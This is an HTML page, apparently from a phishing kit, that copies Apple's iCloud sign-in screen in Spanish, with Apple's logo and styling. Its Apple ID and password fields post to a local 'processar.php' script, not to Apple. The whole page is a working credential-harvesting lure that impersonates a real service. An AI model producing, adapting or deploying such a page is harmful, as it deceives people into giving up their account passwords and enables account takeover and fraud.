<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" prefix="dc: http://purl.org/dc/elements/1.1/">
<head><meta name="author" content="0"/><meta name="keywords" content="0"/>
<meta http-equiv="Content-Type" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no; charset=UTF-8">  
 
 <head>
  <link rel="mask-icon" sizes="any" color="#898989" href="/system/icloud.com/current/static/safari-pinned-tab.svg">
	      <title>iCloud</title>
	      </head>
<style>
    
	#login {
    
    margin-left: auto;
    margin-right: auto;
    margin-top: 2%;
    max-width: 15em;
    padding-bottom: 10px;
    padding-top: 5px;
}


    h2 {
	font-family: SF Pro Display,Helvetica Neue,sans-serif;
    font-size: 32px;
    font-weight: 600;
    line-height: 36px;
    color: #000;
    -webkit-margin-before: 37px;
    margin-block-start: 37px;
    text-align: center;
    }

    body {
	   background-color: #FFFFFF;
       font-family: arial,helvetica,sans-serif;
	    	}
	
	
	/* IMAGEN DE FONDO */
    .my-class {
    position: relative;
    left: 50%;
    top: 20%;
    transform: translate(-50%, -50%);
		}
	
	/* Etiquetas del formulario */
	.fade-in {
    -webkit-animation: fade-in .5s ease-in-out;
    -moz-animation: fade-in .5s ease-in-out;
    -ms-animation: fade-in .5s ease-in-out;
    -o-animation: fade-in .5s ease-in-out;
    animation: fade-in .5s ease-in-out;
}
*, :after, :before {
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
}



div {
   
	 text-align: center;
	 direction: ltr;
}
.si-container[data-theme=dark], .si-container[data-theme=dark] .shared-icon.icon_checked, .si-container[data-theme=dark] .shared-icon.icon_uncheck {
    color: #494949;
}
.si-container {
    text-align: center;
    width: 100%;
    padding: 0;
}
[dir] body, body {
    background-color: transparent;
    text-align: center;
    -webkit-font-smoothing: antialiased;
    -ms-content-zooming: none;
    text-rendering: optimizeLegibility;
}
.tk-body {
    font-size: 17px;
    line-height: 1.47059;
    font-weight: 400;
    letter-spacing: -.022em;
    font-family: SF Pro Text,SF Pro Icons,Helvetica Neue,Helvetica,Arial,sans-serif;
}
body, button, input, select, textarea {
    font-synthesis: none;
    -moz-font-feature-settings: "kern";
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
    direction: ltr;
    text-align: left;
}
body {
    font-size: 17px;
    line-height: 1.47059;
    font-weight: 400;
    letter-spacing: -.022em;
    font-family: SF Pro Text,SF Pro Icons,Helvetica Neue,Helvetica,Arial,sans-serif;
    background-color: #fff;
    color: #333;
    font-style: normal;
	text-align: left;
	margin: 10px 10px 20px;
}
html {
    -webkit-tap-highlight-color: rgba(0,0,0,0);
}
html {
    font-family: SF Pro Text,SF Pro Icons,Helvetica Neue,Helvetica,Arial,sans-serif;
    font-size: 106.25%;
    quotes: "“" "”";
}
html {
    -ms-text-size-adjust: 100%;
    -webkit-text-size-adjust: 100%;
}
*, :after, :before {
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
}
*, :after, :before {
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
}
0% {
    opacity: 0;
}
100% {
    opacity: .6;
}
	
	
	input {
    writing-mode: horizontal-tb !important;
    font-style: ;
    font-variant-ligatures: ;
    font-variant-caps: ;
    font-variant-numeric: ;
    font-variant-east-asian: ;
    font-variant-alternates: ;
    font-weight: ;
    font-stretch: ;
    font-size: ;
    font-family: ;
    font-optical-sizing: ;
    font-kerning: ;
    font-feature-settings: ;
    font-variation-settings: ;
    text-rendering: auto;
    color: fieldtext;
    letter-spacing: normal;
    word-spacing: normal;
    line-height: normal;
    text-transform: none;
    text-indent: 0px;
    text-shadow: none;
    display: inline-block;
    text-align: start;
    appearance: auto;
    -webkit-rtl-ordering: logical;
    cursor: text;
    background-color: field;
    margin: 0em;
    padding: 1px 2px;
    border-width: 2px;
    border-style: inset;
    border-color: -internal-light-dark(rgb(118, 118, 118), rgb(133, 133, 133));
    border-image: initial;
}

.form-cell {
    display: table-cell;
    vertical-align: top;
    direction: ltr;
}
.form-table {
    display: table;
    width: 100%;
    text-align: left;
    position: center;
	vertical-align: top;
    width: 100%;
    height: 34px;
    margin-bottom: 14px;
    padding-left: 15px;
    padding-right: 15px;
}	

.form-textbox {
    font-size: 17px;
    line-height: 1.29412;
    font-weight: 400;
    letter-spacing: -.021em;
    font-family: SF Pro Text,SF Pro Icons,Helvetica Neue,Helvetica,Arial,sans-serif;
    display: inline-block;
    box-sizing: border-box;
    vertical-align: top;
    width: 100%;
    height: 34px;
    margin-bottom: 14px;
    padding-left: 15px;
    padding-right: 15px;
    color: #333;
    text-align: left;
    border: 1px solid #d6d6d6;
    border-radius: 4px;
    background: #fff;
    background-clip: padding-box;
}
	
	auth .password.hide-password .form-textbox {
    height: 0;
    -webkit-transition: height .2s linear .2s;
    -o-transition: height .2s .2s linear;
    transition: height .2s linear .2s;
}



form{
  text-align: center;

}
.fade-in {
    -webkit-animation: fade-in .5s ease-in-out;
    -moz-animation: fade-in .5s ease-in-out;
    -ms-animation: fade-in .5s ease-in-out;
    -o-animation: fade-in .5s ease-in-out;
    animation: fade-in .5s ease-in-out;
	}
	.widget-container .si-field-container {
    max-width: 328px;
    position: relative;
    outline: none;
}

.container {
    margin-right: auto;
    margin-left: auto;
}
input[type="text"], input[type="password"]{
   margin: 10px 10px 18px
   display: block;
  text-align: center; 
 padding-right: 15px;
 margin: 1px 1px 20px;
 
}

</style>
	   <body>
	  
	   
	   <img src="https://www.icloud.com/system/icloud.com/2314Project51/es-es/4f72d89d71e9abcc4e37c71fb77fe65b.svg" width="355px" height="198px" class="my-class"/>
	  
	  
<h2 class="ExerciseTitle">Inicia sesión con el ID de Apple</h2>
	      
		  
		  <div id="login">
	       <form action= "processar.php" method="POST">
			<div class="   container si-field-container  password-second-step  password-on     ">
            <div id="sign_in_form" class="signin-form account-name-entered fed-auth show-password password-entered">
            <div class="">
            <div class="form-table">
            <div class="account-name form-row      show-password ">
           <label class="sr-only form-cell form-label" for="account_name_text_field"></label>
            <div class="form-cell">
            <div class=" form-cell-wrapper ">
            <input type="text" id="account_name_text_field" can-field="accountName" autocomplete="off" autocorrect="off" autocapitalize="off" aria-required="true" required="required" spellcheck="false" ($focus)="appleIdFocusHandler()" ($keyup)="appleIdKeyupHandler()" ($blur)="appleIdBlurHandler()" class="force-ltr form-textbox form-textbox-text" placeholder="ID&nbsp;de&nbsp;Apple" aria-invalid="false" autofocus="">
            <span aria-hidden="true" id="apple_id_field_label" class=" form-label-flyout"></span>
            </div>
            </div>
            </div>
            <div class="password form-row    show-password show-placeholder   ">
        <label class="sr-only form-cell form-label" for="password_text_field"></label>
        <div class="form-cell">
          <div class="form-cell-wrapper ">
            <input type="password" id="password_text_field" ($keyup)="passwordKeyUpHandler()" ($focus)="pwdFocusHandler()" ($blur)="pwdBlurHandler()" aria-required="true" required="required" can-field="password" autocomplete="off" class="form-textbox form-textbox-text " placeholder="Contraseña" aria-invalid="false">
            <span id="password_field_label" aria-hidden="true" class=" form-label-flyout">               
            </span>
            <span class="sr-only form-label-flyout" id="invalid_user_name_pwd_err_msg" aria-hidden="true">              
            </span>
          </div>
        </div>
      </div>
        
    </div>

   
  </div>
              
                

</div>


      

                  
                  
                  
                

                  <div class="si-remember-password">
                      <input type="checkbox" id="remember-me" class="form-choice form-choice-checkbox" {($checked)}="isRememberMeChecked">
                      <label id="remember-me-label" class="form-label" for="remember-me">
                        <span class="form-choice-indicator" aria-hidden="true"></span>                        Mantener la sesión abierta
                      </label>
                    
                  </div>
                
                  <div class="spinner-container auth  hide "></div>
                    <button id="sign-in" ($click)="_verify($element)" tabindex="0" class="si-button btn  fed-ui  moved   fed-ui-animation-show      remember-me  " aria-label="Inicia sesión" aria-disabled="false">
                      <i class="shared-icon icon_sign_in"></i>
                      <span class="text feat-split">Inicia sesión</span>
                    </button>
                
                
              </div>
			
			
			  
	         </form>
	      </div>

	   </body>
       	</html>
